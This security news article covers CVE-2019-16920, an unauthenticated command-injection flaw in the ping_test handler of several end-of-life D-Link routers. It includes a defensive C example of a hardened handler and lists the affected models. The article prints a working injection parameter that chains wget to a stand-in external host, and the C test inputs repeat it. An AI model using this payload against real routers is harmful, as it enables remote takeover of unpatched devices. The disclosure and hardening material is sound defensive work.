Remotely Exploited Vulnerability in D-Link Routers

A dangerous vulnerability (CVE-2019-16920) has been identified in D-Link wireless routers that allows remote code execution on the device by sending a specially crafted request to the "ping_test" handler, which is reachable without authentication.

Notably, the firmware developers intended the "ping_test" call to be performed only after authentication, but in practice it is executed in any case, regardless of whether the user has logged in to the web interface. Specifically, when the apply_sec.cgi script is requested with the "action=ping_test" parameter, the script redirects to the authentication page but still performs the action associated with ping_test. To achieve code execution, a second flaw in ping_test itself was used: it invokes the ping utility without properly validating the IP address supplied for testing. For example, to call the wget utility and send the result of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)".
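The two defects described above are an authorization check that runs after the action instead of before it, and an address parameter that reaches the ping command line unvalidated. The following hardened handler is an added example written for this article, not D-Link's firmware code; the function names, the response codes and the dispatcher shape are assumptions. It gates the action on the session check first, accepts only a single IPv4 or IPv6 literal (inet_pton rejects any trailing bytes, so a newline followed by a second command fails validation), and launches ping through execvp with an argv array so that no shell ever interprets the value.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical hardened replacement for a ping_test handler (added example,
 * not the vendor's code). Two fixes: the authentication check gates the
 * action, and the target address is validated and passed to ping as one
 * argv element, never through a shell. */

/* Returns 1 if s is exactly one IPv4 or IPv6 literal, 0 otherwise.
 * inet_pton() requires the whole string to be an address, so input such as
 * "127.0.0.1\nwget ..." or "127.0.0.1;id" is rejected. Hostnames are also
 * rejected; if they must be supported, resolve them with getaddrinfo() and
 * pass the numeric result to ping instead of the raw user string. */
int validate_ip_target(const char *s) {
    unsigned char buf[16];                       /* large enough for IPv6 */
    if (s == NULL || *s == '\0' || strlen(s) > 45) return 0;
    return inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1;
}

/* Runs "ping -c 1 <target>" without a shell. Each argv element is delivered
 * to ping verbatim, so metacharacters cannot start a second command.
 * Returns ping's exit status, or -1 if the target was rejected or fork failed. */
int run_ping_safely(const char *target) {
    if (!validate_ip_target(target)) return -1;
    char *const argv[] = { "ping", "-c", "1", (char *)target, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp("ping", argv);
        _exit(127);                              /* exec failed */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Assumed response codes for the dispatcher below. */
enum { RESP_OK = 200, RESP_REDIRECT_LOGIN = 302, RESP_BAD_REQUEST = 400 };

/* Dispatcher for an apply_sec.cgi-style endpoint. The unauthenticated path
 * returns before any action is executed, which is the ordering the article
 * says the affected firmware got wrong. ran_ping reports whether ping was
 * actually launched, so callers (and tests) can confirm nothing ran. */
int handle_apply_sec(int authenticated, const char *action,
                     const char *ping_ipaddr, int *ran_ping) {
    *ran_ping = 0;
    if (!authenticated) return RESP_REDIRECT_LOGIN;   /* check first, act later */
    if (action != NULL && strcmp(action, "ping_test") == 0) {
        if (!validate_ip_target(ping_ipaddr)) return RESP_BAD_REQUEST;
        *ran_ping = 1;
        run_ping_safely(ping_ipaddr);
        return RESP_OK;
    }
    return RESP_BAD_REQUEST;
}

int main(void) {
    /* Constructed inputs: a plain address and the article's newline-separated
     * payload shape, decoded from its URL encoding. */
    const char *inputs[] = { "127.0.0.1", "::1", "127.0.0.1\nwget -P /tmp/ http://test.test/" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("validate_ip_target(%zu) = %d\n", i, validate_ip_target(inputs[i]));
    int ran = 0;
    int code = handle_apply_sec(0, "ping_test", "127.0.0.1", &ran);
    printf("unauthenticated request -> %d, ping ran: %d\n", code, ran);
    return 0;
}
```

The important property is not the redirect itself but that `ran_ping` stays 0 on the unauthenticated path and on the malformed-address path; a handler that redirects and then executes the action, as the affected firmware did, would pass a test that only looks at the HTTP status.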


The presence of the vulnerability is officially confirmed in the following models:

  • DIR-655 with firmware 3.02b05 or older;
  • DIR-866L with firmware 1.03b04 or older;
  • DIR-1565 with firmware 1.01 or older;
  • DIR-652 (affected firmware versions not specified)

Since the support period for these models has already expired, D-Link has stated that it will not release firmware updates to fix the vulnerability, does not recommend continuing to use the devices, and advises replacing them with newer models. As a security workaround, access to the web interface can be restricted to trusted IP addresses only.

It later emerged that the vulnerability also affects the DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 and DIR-825 models, for which no updates are known yet either.

Source: opennet.ru
